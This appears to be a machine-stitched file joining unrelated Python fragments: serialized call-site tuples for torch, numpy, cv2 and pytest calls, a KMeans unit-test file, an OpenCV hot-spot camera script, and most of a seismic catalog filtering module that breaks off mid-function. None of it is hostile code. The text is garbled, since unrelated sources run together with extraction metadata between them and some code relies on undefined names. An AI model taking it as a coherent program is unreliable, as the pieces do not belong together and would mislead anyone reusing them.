torch\n'), ((5098, 5159), 'torch.nn.Upsample', 'nn.Upsample', ([], {'size': '(h, w)', 'mode': '"""bilinear"""', 'align_corners': '(True)'}), "(size=(h, w), mode='bilinear', align_corners=True)\n", (5109, 5159), True, 'import torch.nn as nn\n'), ((5313, 5374), 'torch.nn.Upsample', 'nn.Upsample', ([], {'size': '(h, w)', 'mode': '"""bilinear"""', 'align_corners': '(True)'}), "(size=(h, w), mode='bilinear', align_corners=True)\n", (5324, 5374), True, 'import torch.nn as nn\n'), ((538, 626), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channels', 'out_channels'], {'kernel_size': '(3)', 'stride': '(1)', 'padding': '(1)', 'bias': '(False)'}), '(in_channels, out_channels, kernel_size=3, stride=1, padding=1,\n bias=False)\n', (547, 626), True, 'import torch.nn as nn\n'), ((649, 679), 'torch.nn.GroupNorm', 'nn.GroupNorm', (['(32)', 'out_channels'], {}), '(32, out_channels)\n', (661, 679), True, 'import torch.nn as nn\n'), ((702, 723), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (709, 723), True, 'import torch.nn as nn\n'), ((2031, 2081), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channels', 'out_channels', '(3)'], {'padding': '(1)'}), '(in_channels, out_channels, 3, padding=1)\n', (2040, 2081), True, 'import torch.nn as nn\n'), ((2107, 2128), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (2114, 2128), True, 'import torch.nn as nn\n'), ((2154, 2205), 'torch.nn.Conv2d', 'nn.Conv2d', (['out_channels', 'out_channels', '(3)'], {'padding': '(1)'}), '(out_channels, out_channels, 3, padding=1)\n', (2163, 2205), True, 'import torch.nn as nn\n'), ((2231, 2252), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (2238, 2252), True, 'import torch.nn as nn\n'), ((5546, 5571), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (5569, 5571), False, 'import torch\n'), ((5663, 5689), 'torch.rand', 'torch.rand', (['(1)', '(3)', '(256)', '(256)'], {}), '(1, 3, 256, 256)\n', (5673, 5689), False, 
'import torch\n')] |
# Write your k-means unit tests here
from cluster import (KMeans, make_clusters)
import pytest
import numpy as np
def test_kmeans_zero():
"""
Start out with a basic test: Model should not run if k = 0
"""
with pytest.raises(ValueError) as error_message:
km = KMeans(k = 0)
assert "K must be greater than 0!" in str(error_message.value)
def test_kmeans_output():
"""
Another basic test: Check whether my KMeans implementation produces the correct number of prediction labels for various "types" of data
that are generated by the make_clusters function. I'll try this out for various implementations of the data, starting
with "normal" clusters (scale = 1), then tightening and loosening the clusters (scale = 0.3 and scale = 2, respectively).
Finally, I'll try this approach on high-dimensional data.
"""
norm_clusters, norm_labels = make_clusters(k = 4, scale = 1)
t_clusters, t_labels = make_clusters(k = 8, scale = 2)
l_clusters, l_labels = make_clusters(k = 3, scale = 2)
high_dim_clusters, high_dim_labels = make_clusters(n=1000, m=200, k=3)
km_norm = KMeans(k = 4)
km_tight = KMeans(k = 8)
km_loose = KMeans(k = 3)
km_high_dim = KMeans(k = 3)
km_norm.fit(norm_clusters)
km_tight.fit(t_clusters)
km_loose.fit(l_clusters)
km_high_dim.fit(high_dim_clusters)
norm_preds = km_norm.predict(norm_clusters)
tight_preds = km_tight.predict(t_clusters)
loose_preds = km_loose.predict(l_clusters)
high_dim_preds = km_high_dim.predict(high_dim_clusters)
n_norm_preds = len(norm_preds)
n_tight_preds = len(tight_preds)
n_loose_preds = len(loose_preds)
n_high_dim_preds = len(high_dim_preds)
true_n_norm_labs = len(norm_labels)
true_n_tight_labs = len(t_labels)
true_n_loose_labs = len(l_labels)
true_n_high_dim_labs = len(high_dim_labels)
assert n_norm_preds == true_n_norm_labs
assert n_tight_preds == true_n_tight_labs
assert n_loose_preds == true_n_loose_labs
assert n_high_dim_preds == true_n_high_dim_labs
def test_kmeans_n_obs():
"""
My intention for this was to implement a test inside the fit method that would catch if the user was trying to use
n observations < K. However the TAs have graciously included the raising of an Assertion Error in the make_clusters function.
Therefore I've made a test that catches that Assertion Error. Anyways here's the code I was going to implement in the fit method:
if self.n_observations < self.k:
raise ValueError("K must be equal to or greater than the number of observations in your matrix!")
And this would of course have been caught with this test.
"""
with pytest.raises(AssertionError) as error_message:
clusters, labels = make_clusters(n = 3, k=4, scale=1)
assert "" in str(error_message.value) | [
"cluster.make_clusters",
"pytest.raises",
"cluster.KMeans"
] | [((851, 878), 'cluster.make_clusters', 'make_clusters', ([], {'k': '(4)', 'scale': '(1)'}), '(k=4, scale=1)\n', (864, 878), False, 'from cluster import KMeans, make_clusters\n'), ((907, 934), 'cluster.make_clusters', 'make_clusters', ([], {'k': '(8)', 'scale': '(2)'}), '(k=8, scale=2)\n', (920, 934), False, 'from cluster import KMeans, make_clusters\n'), ((963, 990), 'cluster.make_clusters', 'make_clusters', ([], {'k': '(3)', 'scale': '(2)'}), '(k=3, scale=2)\n', (976, 990), False, 'from cluster import KMeans, make_clusters\n'), ((1033, 1066), 'cluster.make_clusters', 'make_clusters', ([], {'n': '(1000)', 'm': '(200)', 'k': '(3)'}), '(n=1000, m=200, k=3)\n', (1046, 1066), False, 'from cluster import KMeans, make_clusters\n'), ((1079, 1090), 'cluster.KMeans', 'KMeans', ([], {'k': '(4)'}), '(k=4)\n', (1085, 1090), False, 'from cluster import KMeans, make_clusters\n'), ((1105, 1116), 'cluster.KMeans', 'KMeans', ([], {'k': '(8)'}), '(k=8)\n', (1111, 1116), False, 'from cluster import KMeans, make_clusters\n'), ((1131, 1142), 'cluster.KMeans', 'KMeans', ([], {'k': '(3)'}), '(k=3)\n', (1137, 1142), False, 'from cluster import KMeans, make_clusters\n'), ((1160, 1171), 'cluster.KMeans', 'KMeans', ([], {'k': '(3)'}), '(k=3)\n', (1166, 1171), False, 'from cluster import KMeans, make_clusters\n'), ((216, 241), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (229, 241), False, 'import pytest\n'), ((267, 278), 'cluster.KMeans', 'KMeans', ([], {'k': '(0)'}), '(k=0)\n', (273, 278), False, 'from cluster import KMeans, make_clusters\n'), ((2577, 2606), 'pytest.raises', 'pytest.raises', (['AssertionError'], {}), '(AssertionError)\n', (2590, 2606), False, 'import pytest\n'), ((2646, 2678), 'cluster.make_clusters', 'make_clusters', ([], {'n': '(3)', 'k': '(4)', 'scale': '(1)'}), '(n=3, k=4, scale=1)\n', (2659, 2678), False, 'from cluster import KMeans, make_clusters\n')] |
import cv2
import time

# Hot-spot capture script: repeatedly grabs frames from the default camera,
# locates the brightest point in each capture, and marks the successive
# spots on a single base image that is written to disk at the end.

# Open Camera
camera = cv2.VideoCapture(0)
# Set definition
camera.set(cv2.CAP_PROP_FRAME_WIDTH, 1280)
camera.set(cv2.CAP_PROP_FRAME_HEIGHT, 1024)
# Give the sensor time to initialize before the first read.
time.sleep(2)
# camera.set(15, -8.0)

def get_image():
    # Grab a single frame; the success flag (retval) is ignored.
    retval, im = camera.read()
    return im

def get_warm_up_image():
    # Warmup: discard 10 frames so auto-exposure/white-balance can settle,
    # then return a fresh frame.
    for i in range(10):
        temp = get_image()
        # Save result
        #file = "/notebooks/test-capture-hot-point/image%d.png" % (i)
        #cv2.imwrite(file, temp)
    return get_image()

# Image to update
base_image = get_warm_up_image()
for i in range(1,6):
    time.sleep(3)
    print("Capturing image... %d" % (i))
    capture = get_warm_up_image()
    # Convert and process: grayscale + large Gaussian blur suppresses
    # single-pixel noise before locating the brightest spot.
    gray = cv2.cvtColor(capture, cv2.COLOR_BGR2GRAY)
    gray = cv2.GaussianBlur(gray, (19,19),0)
    # Find spot (maxLoc is the brightest pixel after blurring)
    (minVal, maxVal, minLoc, maxLoc) = cv2.minMaxLoc(gray)
    # Materialize spot: filled green dot plus a "P<n>" label on the base image
    cv2.circle(base_image,(maxLoc),10,(0,255,0),-1)
    font = cv2.FONT_HERSHEY_SIMPLEX
    cv2.putText(base_image, "P%d" % (i), (maxLoc), font, 0.5, (255,0,0), 1, cv2.LINE_AA)
# Save result
file = "/notebooks/test-capture-hot-point/image.png"
cv2.imwrite(file, base_image)
del(camera) | [
"cv2.imwrite",
"time.sleep",
"cv2.putText",
"cv2.minMaxLoc",
"cv2.circle",
"cv2.VideoCapture",
"cv2.cvtColor",
"cv2.GaussianBlur"
] | [((47, 66), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (63, 66), False, 'import cv2\n'), ((172, 185), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (182, 185), False, 'import time\n'), ((1073, 1102), 'cv2.imwrite', 'cv2.imwrite', (['file', 'base_image'], {}), '(file, base_image)\n', (1084, 1102), False, 'import cv2\n'), ((546, 559), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (556, 559), False, 'import time\n'), ((662, 703), 'cv2.cvtColor', 'cv2.cvtColor', (['capture', 'cv2.COLOR_BGR2GRAY'], {}), '(capture, cv2.COLOR_BGR2GRAY)\n', (674, 703), False, 'import cv2\n'), ((712, 747), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['gray', '(19, 19)', '(0)'], {}), '(gray, (19, 19), 0)\n', (728, 747), False, 'import cv2\n'), ((796, 815), 'cv2.minMaxLoc', 'cv2.minMaxLoc', (['gray'], {}), '(gray)\n', (809, 815), False, 'import cv2\n'), ((838, 889), 'cv2.circle', 'cv2.circle', (['base_image', 'maxLoc', '(10)', '(0, 255, 0)', '(-1)'], {}), '(base_image, maxLoc, 10, (0, 255, 0), -1)\n', (848, 889), False, 'import cv2\n'), ((920, 1007), 'cv2.putText', 'cv2.putText', (['base_image', "('P%d' % i)", 'maxLoc', 'font', '(0.5)', '(255, 0, 0)', '(1)', 'cv2.LINE_AA'], {}), "(base_image, 'P%d' % i, maxLoc, font, 0.5, (255, 0, 0), 1, cv2.\n LINE_AA)\n", (931, 1007), False, 'import cv2\n')] |
#!/usr/bin/env python
#import standard libraries
import obspy.imaging.beachball
import datetime
import os
import csv
import pandas as pd
import numpy as np
import fnmatch
from geopy.distance import geodesic
from math import *
#from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
from matplotlib import path
class NewFile:
    '''Creates a file object with associated uncertainty and event type'''

    def __init__(self, filename, unc, event_type, source):
        """Record the filename, its default uncertainty, the two-letter
        event-type code, and the catalog/source name."""
        self.filename, self.unc = filename, unc
        self.event_type, self.name = event_type, source
def maketime(timestring):
    '''Used in argument parser below. Makes a datetime object from a timestring.

    Tries three formats in order: ISO-like date+time, date only, and a
    month-first format with fractional seconds.  Prints a diagnostic and
    returns None when none of the formats match.
    '''
    TIMEFMT = '%Y-%m-%dT%H:%M:%S'
    DATEFMT = '%Y-%m-%d'
    TIMEFMT2 = '%m-%d-%YT%H:%M:%S.%f'
    outtime = None
    # BUG FIX: the module is imported as `import datetime`, so the parser is
    # datetime.datetime.strptime; the old bare datetime.strptime raised
    # AttributeError, which the blanket excepts silently swallowed, so every
    # parse fell through to the failure message.
    for fmt in (TIMEFMT, DATEFMT, TIMEFMT2):
        try:
            outtime = datetime.datetime.strptime(timestring, fmt)
            break
        except ValueError:
            continue
    else:
        # No format matched.
        print('Could not parse time or date from %s' % timestring)
        print (outtime)
    return outtime
def infile(s):
    '''Stores filename, event type, and uncertainty where provided from comma separated string.

    Accepts either ``infile,unc,etype`` or ``infile,etype``; when the
    uncertainty is omitted a default of 15 is used.

    Raises argparse.ArgumentTypeError when the string fits neither form.
    '''
    import argparse  # local import: only needed for the error type

    default_uncertainty = 15
    parts = s.split(',')
    if len(parts) == 3:
        infile, unc, etype = parts
        try:
            return (infile, float(unc), etype)
        except ValueError:
            # BUG FIX: a 3-field spec with a non-numeric uncertainty used to
            # fall through and silently treat the bad unc as the etype; it is
            # now rejected as malformed.
            pass
    elif len(parts) == 2:
        infile, etype = parts
        return (infile, default_uncertainty, etype)
    raise argparse.ArgumentTypeError('Input file information must be \
given as infile,unc,etype or as infile,etype')
def datelinecross(x):
    ''' Arguments: x - longitude value (positive or negative)
        Returns: x - a positive longitude. Stays the same if the input was positive,
                     is changed to positive if the input was negative '''
    return x + 360 if x < 0 else x
###############################################
### 9 ###
###############################################
## Written GLM
def meridiancross(x):
    ''' Arguments: x - longitude value (positive or negative)
        Returns: x - a longitude in the -180/180 domain '''
    return x - 360 if x > 180 else x
def northcross(x):
    ''' Arguments: x - azimuth value (positive or negative)
        Returns: x - the azimuth shifted by +360 when it is below 90,
                     unchanged otherwise '''
    return x + 360 if x < 90 else x
def unnorthcross(x):
    ''' Arguments: x - azimuth value (positive or negative)
        Returns: x - the azimuth shifted by -360 when it exceeds 360,
                     unchanged otherwise (undoes northcross) '''
    return x - 360 if x > 360 else x
def zerothreesixty(data):
    """Shift the 'lon' column of *data* into the 0-360 longitude domain."""
    data['lon'] = data['lon'].apply(datelinecross)
    return data
def oneeighty(data):
    """Shift the 'lon' column of *data* into the -180/180 longitude domain."""
    data['lon'] = data['lon'].apply(meridiancross)
    return data
def northernaz(data):
    """Shift azimuths below 90 in the 'az' column up by 360 (see northcross)."""
    data['az'] = data['az'].apply(northcross)
    return data
def notnorthanymore(data):
    """Undo northernaz: shift azimuths above 360 in the 'az' column back down."""
    data['az'] = data['az'].apply(unnorthcross)
    return data
def writetofile(input_file, output_file, event_type, uncertainty, args, catalogs, file_no, seismo_thick, slabname, name):
    ''' Writes an input file object to the given output file.
        Acquires the necessary columns from the file, calculates moment tensor information.
        Eliminates rows of data that do not fall within the specified bounds
        (date, magnitude, & location).
        If the event type is an earthquake, the catalog is compared to all previously
        entered catalogs. Duplicate events are removed from the subsequent entries
        (prioritization is determined by the order in which catalogs are entered).
        Writes filtered dataframe to output file and prints progress to console.
        Arguments:  input_file - input file from input or slab2database
                    output_file - file where new dataset will be written
                    event_type - two letter ID that indicates the type of data (AS, EQ, BA, etc)
                    uncertainty - the default uncertainty associated with this file or event type
                    args - arguments provided from command line (bounds, magnitude limits, etc)
                    catalogs - a list of EQ catalogs that are being written to this file
                    file_no - file number, used for making event IDs '''
    in_file = open(input_file)  # NOTE(review): this handle is never read or closed
    fcsv = (input_file[:-4]+'.csv')
    # Reading .csv file into dataframe - all files must be in .csv format
    try:
        if input_file.endswith('.csv'):
            data = pd.read_csv(input_file, low_memory=False)
        else:
            print ('Input file %s was not written to file. MUST BE IN .CSV FORMAT' % input_file)
            pass
    except:
        print ('Could not read file %s. A header line of column labels \
followed by a deliminated dataset is expected. Check file format to ensure this \
is such. All files must be in .csv format.' % input_file)
    # Ensure every event has an ID: reuse an existing ID/id_no column, or
    # synthesize sequential IDs from the file number.
    if 'ID' in data.columns:
        pass
    elif 'id_no' in data.columns:
        data['ID'] = data['id_no'].values
    else:
        start_ID = file_no*100000
        stop_ID = start_ID + len(data)
        ID = np.arange(start_ID, stop_ID, 1)
        data['ID'] = ID
    # Filter columns / compute MT info, then clip to the slab region or CLI bounds.
    data = makeframe(data, fcsv, event_type, uncertainty, args, seismo_thick,slabname)
    data = inbounds(args, data, slabname)
    #If option is chosen at command line, removes duplicate entries for the same event
    #alternate preference for global or regional catalogues depending upon input arguments
    try:
        regional_pref
    except NameError:
        # regional_pref is only defined when duplicate filtering is requested;
        # without it the de-duplication step is skipped entirely.
        pass
    else:
        try:
            tup = (data, fcsv)
            if len(catalogs) > 0:
                # Move the global catalog to the front (regional_pref == 0) or
                # back (regional_pref == 1) so it is matched first or last.
                for idx, row in enumerate(catalogs):
                    if fnmatch.fnmatch(row, '*global*'):
                        position = idx
                        name_of_file = row
                if regional_pref == 0 and position != 0:
                    first_file = catalogs[0]
                    catalogs[position] = first_file
                    catalogs[0] = name_of_file
                elif regional_pref == 1 and position != (len(catalogs)-1):
                    last_file = catalogs[(len(catalogs)-1)]
                    catalogs[position] = first_file
                    catalogs[(len(catalogs)-1)] = name_of_file
                else:
                    pass
                # Drop events already present in previously entered catalogs.
                for cat in catalogs:
                    data = rid_matches(cat[0], data, cat[1], fcsv)
            elif len(catalogs) == 0:
                catalogs.append(tup)
        except:
            print ('If file contains earthquake information (event-type = EQ), \
required columns include: lat,lon,depth,mag,time. The columns of the current \
file: %s. Check file format to ensure these columns are present and properly \
labeled.' % data.columns)
    #MF 8.9.16 add source to output file
    try:
        listints = data['ID'].values.astype(int)
    except:
        # Non-numeric IDs: preserve them in id_no and issue fresh numeric IDs.
        start_ID = file_no*100000
        stop_ID = start_ID + len(data)
        ID = np.arange(start_ID, stop_ID, 1)
        data['id_no'] = data['ID'].values
        data['ID'] = ID
    data['src'] = name
    write_data(data, output_file)
    print ('The file: %s was written to %s' % (input_file, output_file))
    print ('---------------------------------------------------------------------------------')
def castfloats(data):
    '''Casts all numerical and nan values to floats to avoid error in calculations.

    The four location columns are always converted; magnitude, moment-tensor
    components, and principal-axis / nodal-plane columns are converted only
    when present.  Returns the same dataframe with converted dtypes.
    '''
    for col in ('lat', 'lon', 'depth', 'unc'):
        data[[col]] = data[[col]].astype(float)
    if 'mag' in data.columns:
        data[['mag']] = data[['mag']].astype(float)
    if 'mrr' in data.columns:
        for col in ('mrr', 'mtt', 'mpp', 'mrt', 'mrp', 'mtp'):
            data[[col]] = data[[col]].astype(float)
    if 'Paz' in data.columns and 'Ppl' in data.columns:
        for col in ('Paz', 'Ppl', 'Taz', 'Tpl',
                    'S1', 'D1', 'R1', 'S2', 'D2', 'R2'):
            data[[col]] = data[[col]].astype(float)
    return data
def rid_nans(df):
    '''Removes points where lat,lon,depth, or uncertainty values are not provided.

    np.isfinite drops both NaN and +/-inf entries.
    '''
    for col in ('lat', 'lon', 'depth', 'unc'):
        df = df[np.isfinite(df[col])]
    return df
def write_data(df, output_file):
    ''' Arguments: df - filtered dataframe to be written to file
        output_file - output file where data is to be written

    Creates the file (with a header line) when it does not exist; otherwise
    the existing contents are read back, concatenated with the new rows, and
    the whole set is re-written.  Rows are cast to float and rows with
    missing location info are dropped first.
    '''
    df = castfloats(df)
    df = rid_nans(df)
    if not os.path.isfile(output_file):
        # New file: write the dataframe with a header line.
        with open(output_file, 'w') as f:
            df.to_csv(f, header=True, index=False, float_format='%0.3f', na_rep = float('nan'))
    # If the output file already exists, new filtered data points are appended to
    # existing information
    else:
        old = pd.read_csv(output_file)
        # Renamed from `all`, which shadowed the builtin of the same name.
        combined = pd.concat([old, df], sort=True)
        combined = castfloats(combined)
        combined = rid_nans(combined)
        # Keep the column set of whichever frame has more columns so no
        # information is dropped from either source.
        if len(df.columns) > len(old.columns):
            combined = combined[df.columns]
        else:
            combined = combined[old.columns]
        # Writes desired columns of a filtered dataframe to the output file
        with open(output_file, 'w') as f:
            combined.to_csv(f, header=True, index=False, float_format='%0.3f', na_rep = float('nan'))
def inbounds(args, data, slab):
    ''' Originally written by Ginvera, modified by MAF July 2016 '''
    ''' Arguments: args - input arguments provided from command line arguments
        data - dataframe to be filtered based on bounds
        Returns: data - filtered dataframe based on bounds '''
    # Eliminates data points that are not within specified bounds where provided
    if 'time' in data.columns:
        # Normalize the time column: try the default parser, then two explicit
        # month-first formats, and finally fall back to row-by-row parsing,
        # dropping rows whose timestamps cannot be parsed at all.
        try:
            data['time'] = pd.to_datetime(data['time'])
        except:
            try:
                data['time'] = pd.to_datetime(data['time'],format='%m-%d-%YT%H:%M:%S')
            except:
                try:
                    data['time'] = pd.to_datetime(data['time'],format='%m-%d-%YT%H:%M:%S.%f')
                except:
                    # Known-bad timestamp (hour 29) hard-coded out of one catalog.
                    data = data[data.time != '9-14-2012T29:54:59.53']
                    data = data.reset_index(drop=True)
                    for index,row in data.iterrows():
                        print (row['time'])
                        try:
                            row['time'] = pd.to_datetime(row['time'],format='%m-%d-%YT%H:%M:%S')
                        except:
                            try:
                                row['time'] = pd.to_datetime(row['time'],format='%m-%d-%YT%H:%M:%S.%f')
                            except:
                                print ('this row could not be added, invalid time')
                                print ('lon,lat,depth,mag,time')
                                print (row['lon'],row['lat'],row['depth'],row['mag'],row['time'])
                                data.drop(index, inplace=True)
    # Default window covering all plausible event times.
    stime = datetime.datetime(1900,1,1)
    etime = datetime.datetime.utcnow()
    if args.startTime and args.endTime and args.startTime >= args.endTime:
        print ('End time must be greater than start time. Your inputs: Start %s \
End %s' % (args.startTime, args.endTime))
        # NOTE(review): sys is not imported at the top of this file -- confirm.
        sys.exit(1)
    if args.bounds is not None:
        # Explicit lon/lat box from the command line.
        lonmin = args.bounds[0]
        lonmax = args.bounds[1]
        latmin = args.bounds[2]
        latmax = args.bounds[3]
        # Detect a box that straddles the dateline (west edge positive,
        # east edge negative): use OR on the lon test in that case.
        minwest = lonmin > 0 and lonmin < 180
        maxeast = lonmax < 0 and lonmax > -180
        if minwest and maxeast:
            data = data[(data.lon >= lonmin) | (data.lon <= lonmax)]
        else:
            data = data[(data.lon >= lonmin) & (data.lon <= lonmax)]
        data = data[(data.lat >= latmin) & (data.lat <= latmax)]
    else:
        #first filter data within the slab outline (just gets locations though - doesn't filter by rest of info!)
        #also, original data was a dataframe
        data = getDataInRect(slab,data)
        if len(data) > 0:
            data_lon = data['lon']
            data_lat = data['lat']
            data_coords = list(zip(data_lon,data_lat))
            # Indices of points outside the slab polygon are dropped.
            indexes_of_bad_data = getDataInPolygon(slab,data_coords)
            data_to_keep = data.drop(data.index[indexes_of_bad_data])
            data = data_to_keep
        else:
            return data
    # Optional time and magnitude windows from the command line.
    if args.startTime is not None and 'time' in data.columns:
        stime = args.startTime
        data = data[data.time >= stime]
    if args.endTime is not None and 'time' in data.columns:
        etime = args.endTime
        data = data[data.time <= etime]
    if args.magRange is not None and 'mag' in data.columns:
        magmin = args.magRange[0]
        magmax = args.magRange[1]
        data = data[(data.mag >= magmin) & (data.mag <= magmax)]
    return data
def slabpolygon(slabname):
    #####################################
    #written by <NAME>, 7/19/2016#
    #####################################
    '''
    inputting the slabname (3 character code) will return the polygon boundaries

    Reads library/misc/slab_polygons.txt (csv rows of the form
    name,lon1,lat1,lon2,lat2,...) and returns the coordinate fields of the
    matching row as a flat list of strings (empty list if no match).
    '''
    #load file with slab polygon boundaries
    slabfile = 'library/misc/slab_polygons.txt'
    filerows = []
    with open(slabfile) as csvfile:
        reader = csv.reader(csvfile, delimiter=',')
        for row in reader:
            filerows.append(row)
    #iterate through list to match the slabname and retrieve coordinates
    slabbounds = []
    for row in filerows:
        if slabname == row[0]:
            slabbounds = row[1:]
            # BUG FIX: the original also executed
            # `slabbounds.append(slabbounds)`, appending the list to itself
            # and corrupting the returned coordinates with a circular
            # self-reference.
    return slabbounds
def determine_polygon_extrema(slabname):
    #####################################
    #written by <NAME>, 7/18/2016#
    #####################################
    '''
    inputs: slabname to be referenced against stored slab coordinates
    outputs: the maximum and minimum latitude and longitude values for the input slab
    '''
    #calls slabpolygon function to get bounds for this slab region
    slabbounds = slabpolygon(slabname)
    #slabbbounds come in lon1,lat1,lon2,lat2... format
    #even numbers are then longitudes while odds are latitudes
    coords = np.size(slabbounds)
    #simple even/odd function
    def is_odd(num):
        return num & 0x1
    lons = []
    lats = []
    # Split the flat lon,lat,lon,lat,... sequence into two lists.
    for i in range(coords):
        val = slabbounds[i]
        if is_odd(i):
            lats.append(val)
        else:
            lons.append(val)
    # NOTE(review): values read from the csv are strings, so min()/max()
    # compare lexicographically, and int() on a string containing a decimal
    # point raises ValueError -- confirm the polygon file stores integer
    # degree values.
    x1 = int(min(lons))
    x2 = int(max(lons))
    y1 = int(min(lats))
    y2 = int(max(lats))
    return x1,x2,y1,y2
def create_grid_nodes(grd_space,slabname):
    #####################################
    #written by <NAME>, 7/18/2016#
    #####################################
    '''
    inputs: grid spacing between nodes of regular grid (must be an integer), slab code
    outputs: coordinates of each node (corner/intersection) within the regular grid (numpy array)
    '''
    xmin,xmax,ymin,ymax = determine_polygon_extrema(slabname)
    total_degrees_lon = xmax-xmin
    total_degrees_lat = ymax-ymin
    #max_iter represents max number of iterations in the y direction (longitude direction)
    # BUG FIX: this code predates Python 3, where `/` returns a float; the
    # float then reached np.zeros() (TypeError) and the `count == max_iter-1`
    # test.  Floor division restores the original integer semantics.
    max_iter = total_degrees_lon//grd_space
    #define a grid to divide the area
    #accounts for a non-even division
    q1, r1 = divmod(total_degrees_lat, grd_space)
    q2, r2 = divmod(total_degrees_lon, grd_space)
    # NOTE(review): adding the extra row/column when the remainder is ZERO
    # (rather than non-zero) looks inverted -- confirm against the intended
    # grid counts before relying on them; behavior preserved here.
    if r1 > 0:
        grid_y = total_degrees_lat//grd_space
    else:
        grid_y = total_degrees_lat//grd_space + 1
    if r2 > 0:
        grid_x = total_degrees_lon//grd_space
    else:
        grid_x = total_degrees_lon//grd_space + 1
    #the total number of grids
    boxes = int(grid_y*grid_x)
    #initialize array to save time
    boundaries = np.zeros([boxes,4])
    '''
    count keeps track of iterations of longitude
    holds latmin/latmax steady while lonmin/lonmax changes across
    when max iterations in longitude have completed (gone across area)
    the latmin/latmix will adjust and lonmin/lonmax will also be reset.
    This process will continue until the number of boxes has been reached.
    '''
    count = 0
    for i in range(boxes):
        if count == max_iter-1:
            # End of a longitude sweep: emit this box, then step the lat
            # band south and reset the longitude offset for the next row.
            lonmax = xmax + grd_space*count
            lonmin = xmin + grd_space*count
            count = 0
            latmax = ymax
            latmin = ymin
            boundaries[i,0] = lonmin
            boundaries[i,1] = lonmax
            boundaries[i,2] = latmin
            boundaries[i,3] = latmax
            ymax = ymax - grd_space
            ymin = ymin - grd_space
        else:
            lonmax = xmax + grd_space*count
            lonmin = xmin + grd_space*count
            count = count+1
            latmax = ymax
            latmin = ymin
            boundaries[i,0] = lonmin
            boundaries[i,1] = lonmax
            boundaries[i,2] = latmin
            boundaries[i,3] = latmax
    return boundaries
def getDataInPolygon(slabname,data):
    #####################################
    #written by <NAME>, 7/20/2016#
    #####################################
    ''' creates a grid of 1 or nan based on if they are within a clipping mask or not. DEP.6.29.16 '''
    ''' modified to fit this script by MAF 7/18/16 '''
    ### Input:
    # slabname: a 3 digit character code identifying a slab region
    #data: the input data which may or may not be within the polygon
    ### Output:
    #contained_data: an array of coordinate pairs (lon,lat) that reside within the polygon region
    #check if slabbounds are already defined. If not, acquire them
    slabbounds = slabpolygon(slabname)
    #slabbbounds come in lon1,lat1,lon2,lat2... format
    #even numbers are then longitudes while odds are latitudes
    coords = np.size(slabbounds)
    #simple even/odd function
    def is_odd(num):
        return num & 0x1
    lons = []
    lats = []
    for i in range(coords):
        # NOTE(review): [1:] drops the first character of each coordinate
        # string -- confirm this matches the polygon file format.
        val = slabbounds[i][1:]
        if is_odd(i):
            lats.append(val)
        else:
            lons.append(val)
    #create tuple of locations (with zip) to use in contains_points
    xy = list(zip(lons,lats))
    poly = path.Path(xy)
    temp = poly.contains_points(data[:])
    # mask: 1 where the point is inside the polygon, NaN where outside
    # (0 * NaN = NaN, so this starts as an all-NaN vector).
    mask = np.zeros(len(temp),)*np.nan
    mask[temp] = 1
    keepers = []
    for i in range(len(data)):
        # Multiplying by the mask NaNs-out coordinates that fall outside.
        points_in_poly = np.dot(mask[i],data[i])
        if i > 0:
            keepers = np.vstack((keepers,points_in_poly))
        else:
            keepers = points_in_poly
    # Collect the row indices whose coordinates were NaNed (outside polygon);
    # the caller drops exactly these rows.
    rows_to_drop = []
    for i in range(len(keepers)):
        if np.isnan(keepers[i][0]) == True:
            rows_to_drop.append(i)
    return rows_to_drop
def getDataInRect(slabname,data1):
    #####################################
    #written by <NAME>, 7/20/2016#
    #####################################
    ''' creates a grid of 1 or nan based on if they are within a clipping mask or not. DEP.6.29.16 '''
    ''' modified to fit this script by MAF 7/18/16 '''
    ### Input:
    # slabname: a 3 digit character code identifying a slab region
    #data: the input data which may or may not be within the polygon
    ### Output:
    #contained_data: an array of coordinate pairs (lon,lat) that reside within the polygon region
    #check if slabbounds are already defined. If not, acquire them
    slabbounds = slabpolygon(slabname)
    #slabbbounds come in lon1,lat1,lon2,lat2... format
    #even numbers are then longitudes while odds are latitudes
    coords = np.size(slabbounds)
    #simple even/odd function
    def is_odd(num):
        return num & 0x1
    lons = []
    lats = []
    for i in range(coords):
        # NOTE(review): [1:] drops the first character of each coordinate
        # string -- confirm this matches the polygon file format.
        val = slabbounds[i][1:]
        try:
            val = float(val)
        except:
            # Stop at the first non-numeric field.
            break
        if is_odd(i):
            lats.append(val)
        else:
            lons.append(val)
    # Bounding box of the polygon outline.
    lonmin = min(lons)
    lonmax = max(lons)
    latmin = min(lats)
    latmax = max(lats)
    # Match the longitude convention of the data to the box before clipping.
    if lonmin < 0 and lonmax < 0:
        data1 = oneeighty(data1)
    else:
        data1 = zerothreesixty(data1)
    data1 = data1[(data1.lon > lonmin) & (data1.lon < lonmax) &(data1.lat > latmin) &(data1.lat < latmax)]
    return data1
def cmtfilter(data,seismo_thick):
    ''' Arguments: data - data with all shallow/nonshallow and thrust/nonthrust earthquake
        Returns: filtered - fitered dataframe which DEPENDS ON WHAT YOU DO/DONT COMMENT OUT
                 (1) filters only shallow earthquakes that have MT criteria which are non thrust
                     all other shallow earthquakes WITHOUT MT info are NOT filtered
                 OR
                 (2) filters ALL shallow earthquakes UNLESS they have MT info and that
                     MT info has the criteria of a thrust event. '''
    # Removes non-thrust events from depths shallower than seismogenic zone
    deep_data = data[data.depth >= seismo_thick]
    # Includes shallow data without MT info (1) - comment out next two lines for (2)
    dfn = data[np.isnan(data['Paz'])]
    # NOTE(review): the boolean mask below comes from `data`, not `dfn`;
    # pandas aligns it by index so the result is the shallow subset of dfn,
    # but it reads oddly -- confirm intent.
    dfn = dfn[data.depth < seismo_thick]
    data = data[np.isfinite(data['Paz'])]
    shallow_data = data[data.depth < seismo_thick]
